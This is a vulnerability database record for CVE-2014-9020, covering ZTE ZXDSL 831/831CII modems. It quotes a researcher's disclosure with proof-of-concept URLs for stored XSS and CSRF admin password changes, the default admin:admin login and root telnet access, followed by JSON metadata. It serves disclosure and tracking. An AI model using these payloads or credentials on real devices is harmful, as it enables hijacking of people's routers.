VAR-201411-0114
Vulnerability from variot - Updated: 2023-12-18 12:38

Cross-site scripting (XSS) vulnerability in the Quick Stats page (psilan.cgi) in ZTE ZXDSL 831 and 831CII allows remote attackers to inject arbitrary web script or HTML via the domainname parameter in a save action. NOTE: this issue was SPLIT from CVE-2014-9021 per ADT1 due to different affected products and codebases.

The ZTE 831CII is a router device. ZTE 831CII has HTML injection, cross-site request forgery, clickjacking, information disclosure, and unauthorized access vulnerabilities, allowing remote attackers to perform certain administrative operations, execute arbitrary scripts or HTML code in the browser context, or steal cookie-based authentication certificates.

ZTE 831CII is prone to the following security vulnerabilities:
1. An HTML-injection vulnerability
2. A cross-site request-forgery vulnerability
3. An unspecified clickjacking vulnerability
4. An information-disclosure vulnerability
5. Other attacks are also possible.

Both ZTE ZXDSL 831 and 831CII are ADSL modem (Modem) products of China ZTE Corporation.

Hardcoded default misconfiguration - The modem comes with admin:admin user credentials.

Stored XSS - http://192.168.1.1/psilan.cgi?action=save&ethIpAddress=192.168.1.1&ethSubnetMask=255.255.255.0&hostname=ZXDSL83C1II&domainname=home%27;alert%280%29;//&enblUpnp=1&enblLan2=0
Any user browsing to http://192.168.1.1/main.html will have a stored XSS executed!

CSRF based Stored XSS - http://192.168.1.1/adminpasswd.cgi?action=save&sysUserName=%27;alert%280%29;//&sysPassword=37F6E6F627B6 - letting an admin visit this link would result in the admin username being changed to ';alert(0);// and also a stored XSS in the home page.

CSRF - There is no token/captcha or even a current password prompt when the admin changes the password, and credentials are sent over GET.
PoC: http://192.168.1.1/adminpasswd.cgi?action=save&sysUserName=admin&sysPassword=F6C656269697
If an authenticated admin browses that link, their credentials will become admin:yibelo

UI Redressing - The modem (like most modems) does not have clickjacking protection. Thus, it can be used to modify settings or override admin accounts by a simple clickjack. For example, by using http://192.168.1.1/adminpasswd.html it is possible to trick an admin into submitting a form with our credentials (since it doesn't require the current password).

Not using SSL - The modem does not use HTTPS, so anyone can use MiTM to sniff ongoing actions and possibly gain user credentials.

Unrestricted privileges - Anyone who is connected to the modem with Telnet or tftp is root. Simply telnetting and authenticating as admin:admin and typing sh and echo $USER would prove that.

Exploit Title: ZTE ZXDSL 831 Multiple Cross Site Scripting
Date: 11/3/2014
Exploit Author: Paulos Yibelo
Vendor Homepage: zte.com.cn
Software Link: -
Version: -
Tested on: Windows 7
CVE :-
TR-069 Client page: Stored
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201411-0114",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "zxdsl 831cii",
"scope": "eq",
"trust": 1.6,
"vendor": "zte",
"version": null
},
{
"model": "zxdsl 831",
"scope": "eq",
"trust": 1.6,
"vendor": "zte",
"version": null
},
{
"model": "zxdsl 831",
"scope": null,
"trust": 0.8,
"vendor": "zte",
"version": null
},
{
"model": "zxdsl 831cii",
"scope": null,
"trust": 0.8,
"vendor": "zte",
"version": null
},
{
"model": "831cii",
"scope": null,
"trust": 0.6,
"vendor": "zte",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-08309"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005571"
},
{
"db": "NVD",
"id": "CVE-2014-9020"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-377"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:zte:zxdsl_831cii:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:zte:zxdsl_831:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-9020"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "habte.yibelo",
"sources": [
{
"db": "BID",
"id": "70984"
}
],
"trust": 0.3
},
"cve": "CVE-2014-9020",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2014-9020",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-08309",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-76965",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2014-9020",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2014-08309",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201411-377",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-76965",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-08309"
},
{
"db": "VULHUB",
"id": "VHN-76965"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005571"
},
{
"db": "NVD",
"id": "CVE-2014-9020"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-377"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting (XSS) vulnerability in the Quick Stats page (psilan.cgi) in ZTE ZXDSL 831 and 831CII allows remote attackers to inject arbitrary web script or HTML via the domainname parameter in a save action. NOTE: this issue was SPLIT from CVE-2014-9021 per ADT1 due to different affected products and codebases. The ZTE 831CII is a router device. ZTE 831CII has HTML injection, cross-site request forgery, clickjacking, information disclosure, and unauthorized access vulnerabilities, allowing remote attackers to perform certain administrative operations, execute arbitrary scripts or HTML code in the browser context, or steal cookie-based authentication certificates. ZTE 831CII is prone to the following security vulnerabilities:\n1. An HTML-injection vulnerability\n2. A cross-site request-forgery vulnerability\n3. An unspecified clickjacking vulnerability\n4. An information-disclosure vulnerability\n5. Other attacks are also possible. Both ZTE ZXDSL 831 and 831CII are ADSL modem (Modem) products of China ZTE Corporation. Hardcoded default misconfiguration - The modem comes with admin:admin user credintials. \n\nStored XSS - http://192.168.1.1/psilan.cgi?action=save\u0026ethIpAddress=192.168.1.1\u0026ethSubnetMask=255.255.255.0\u0026hostname=ZXDSL83C1II\u0026domainname=home%27;alert%280%29;//\u0026enblUpnp=1\u0026enblLan2=0\nAny user browsing to http://192.168.1.1/main.html will have a stored xss executed!\n\nCSRF based Stored XSS - http://192.168.1.1/adminpasswd.cgi?action=save\u0026sysUserName=%27;alert%280%29;//\u0026sysPassword=37F6E6F627B6 - letting an admin visit this link would result the admin username changed to \u0027;alert(0);// also a stored XSS in the home page. \n\nCSRF - there is no token/capcha or even current password prompt when the admin changes the password, and creditintials are sent over GET. 
PoC: http://192.168.1.1/adminpasswd.cgi?action=save\u0026sysUserName=admin\u0026sysPassword=F6C656269697\nif an authenticated admin browses that link their credintials will become admin:yibelo\n\nUI Redressing - The modem (like most modems) does not have a clickjacking protection. thus, can be used to modify settings, override admin accounts by a simple clickjack. forexample by using http://192.168.1.1/adminpasswd.html it is possible into tricking an admin submit a form with our credintials (since it doesn\u0027t require current password)\n\nnot using SSL - The modem does not use HTTPS, so anyone can use MiTM to sniff on going actions, possibly gain user credintials. \n\nUnrestricted privileges - anyone who is connected to the modem with Telnet or tftp is root. simply telneting and authenticating as admin:admin and typing sh and echo $USER would prove that. # Exploit Title: ZTE ZXDSL 831 Multiple Cross Site Scripting\n# Date: 11/3/2014\n# Exploit Author: Paulos Yibelo\n# Vendor Homepage: zte.com.cn\n# Software Link: -\n# Version: -\n# Tested on: Windows 7\n# CVE :-\n\nTR-069 Client page: Stored",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-9020"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005571"
},
{
"db": "CNVD",
"id": "CNVD-2014-08309"
},
{
"db": "BID",
"id": "70984"
},
{
"db": "VULHUB",
"id": "VHN-76965"
},
{
"db": "PACKETSTORM",
"id": "129016"
},
{
"db": "PACKETSTORM",
"id": "129017"
}
],
"trust": 2.7
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-9020",
"trust": 3.6
},
{
"db": "BID",
"id": "70984",
"trust": 2.6
},
{
"db": "PACKETSTORM",
"id": "129017",
"trust": 1.8
},
{
"db": "PACKETSTORM",
"id": "129016",
"trust": 1.8
},
{
"db": "BID",
"id": "70985",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005571",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201411-377",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-08309",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20141106 ZTE 831CII MULTIPLE VULNERABLITIES",
"trust": 0.6
},
{
"db": "XF",
"id": "98584",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-76965",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-08309"
},
{
"db": "VULHUB",
"id": "VHN-76965"
},
{
"db": "BID",
"id": "70984"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005571"
},
{
"db": "PACKETSTORM",
"id": "129016"
},
{
"db": "PACKETSTORM",
"id": "129017"
},
{
"db": "NVD",
"id": "CVE-2014-9020"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-377"
}
]
},
"id": "VAR-201411-0114",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-08309"
},
{
"db": "VULHUB",
"id": "VHN-76965"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-08309"
}
]
},
"last_update_date": "2023-12-18T12:38:08.552000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://wwwen.zte.com.cn/en/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005571"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-76965"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005571"
},
{
"db": "NVD",
"id": "CVE-2014-9020"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/70984"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/70985"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/129016/zte-831cii-hardcoded-credential-xss-csrf.html"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/129017/zte-zxdsl-831-cross-site-scripting.html"
},
{
"trust": 1.4,
"url": "http://www.securityfocus.com/archive/1/archive/1/533930/100/0/threaded"
},
{
"trust": 1.4,
"url": "http://www.securityfocus.com/archive/1/archive/1/533931/100/0/threaded"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/533930/100/0/threaded"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/533931/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98584"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9020"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-9020"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/70984/"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/98584"
},
{
"trust": 0.2,
"url": "http://192.168.1.1/psilan.cgi?action=save\u0026ethipaddress=192.168.1.1\u0026ethsubnetmask=255.255.255.0\u0026hostname=zxdsl83c1ii\u0026domainname=home%27;alert%280%29;//\u0026enblupnp=1\u0026enbllan2=0"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-9020"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-9183"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/adminpasswd.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-9019"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/main.html"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/adminpasswd.cgi?action=save\u0026sysusername=%27;alert%280%29;//\u0026syspassword=37f6e6f627b6"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/adminpasswd.cgi?action=save\u0026sysusername=admin\u0026syspassword=f6c656269697"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/tr69cfg.cgi?tr69cinformenable=1\u0026tr69cinforminterval=43200\u0026tr69cacsurl=http://acs.site.et:9090/web/tr069\u0026tr69cacsuser=cpe\u0026tr69cacspwd=cpe\u0026tr69cconnrequser=itms\u0026tr69cconnreqpwd=itms%27;alert%280%29;//\u0026tr69cnoneconnreqauth=0\u0026tr69cdebugenable=0%27;alert%280%29;//"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/tr69cfg.html"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/tr69cfg.cgi?tr69cinformenable=1\u0026tr69cinforminterval=43200\u0026tr69cacsurl=http://acs.site.et:9090/web/tr069\u0026tr69cacsuser=cpe%27;alert%280%29;//\u0026tr69cacspwd=cpe\u0026tr69cconnrequser=itms\u0026tr69cconnreqpwd=itms\u0026tr69cnoneconnreqauth=0\u0026tr69cdebugenable=0"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/tr69cfg.cgi?tr69cinformenable=1\u0026tr69cinforminterval=43200\u0026tr69cacsurl=http://acs.etc.et:9090/web/tr069%27;alert%280%29;//\u0026tr69cacsuser=cpe\u0026tr69cacspwd=cpe\u0026tr69cconnrequser=itms\u0026tr69cconnreqpwd=itms\u0026tr69cnoneconnreqauth=0\u0026tr69cdebugenable=0"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/tr69cfg.cgi?tr69cinformenable=1\u0026tr69cinforminterval=43200\u0026tr69cacsurl=http://acs.site.et:9090/web/tr069\u0026tr69cacsuser=cpe\u0026tr69cacspwd=cpe%27;alert%280%29;//\u0026tr69cconnrequser=itms\u0026tr69cconnreqpwd=itms\u0026tr69cnoneconnreqauth=0\u0026tr69cdebugenable=0"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-9021"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/sntpcfg.sntp?ntp_enabled=0\u0026tmyear=2000%27lol\u0026tmmonth=01\u0026tmday=01\u0026tmhour=00\u0026tmminute=30\u0026timezone_offset=+08:00\u0026timezone=beijing,%20chongqing,%20hong%20kong,%20urumqi%22;alert%280%29;//\u0026use_dst=0\u0026enbllightsaving=0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-08309"
},
{
"db": "VULHUB",
"id": "VHN-76965"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005571"
},
{
"db": "PACKETSTORM",
"id": "129016"
},
{
"db": "PACKETSTORM",
"id": "129017"
},
{
"db": "NVD",
"id": "CVE-2014-9020"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-377"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-08309"
},
{
"db": "VULHUB",
"id": "VHN-76965"
},
{
"db": "BID",
"id": "70984"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005571"
},
{
"db": "PACKETSTORM",
"id": "129016"
},
{
"db": "PACKETSTORM",
"id": "129017"
},
{
"db": "NVD",
"id": "CVE-2014-9020"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-377"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-11-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-08309"
},
{
"date": "2014-11-20T00:00:00",
"db": "VULHUB",
"id": "VHN-76965"
},
{
"date": "2014-11-06T00:00:00",
"db": "BID",
"id": "70984"
},
{
"date": "2014-11-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005571"
},
{
"date": "2014-11-07T16:52:33",
"db": "PACKETSTORM",
"id": "129016"
},
{
"date": "2014-11-07T16:56:04",
"db": "PACKETSTORM",
"id": "129017"
},
{
"date": "2014-11-20T17:50:08.973000",
"db": "NVD",
"id": "CVE-2014-9020"
},
{
"date": "2014-11-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-377"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-11-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-08309"
},
{
"date": "2018-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-76965"
},
{
"date": "2014-12-09T00:55:00",
"db": "BID",
"id": "70984"
},
{
"date": "2014-11-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005571"
},
{
"date": "2018-10-09T19:54:53.717000",
"db": "NVD",
"id": "CVE-2014-9020"
},
{
"date": "2014-11-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-377"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201411-377"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZTE ZXDSL 831 and 831CII of Quick Stats Page cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005571"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "129017"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-377"
}
],
"trust": 0.7
}
}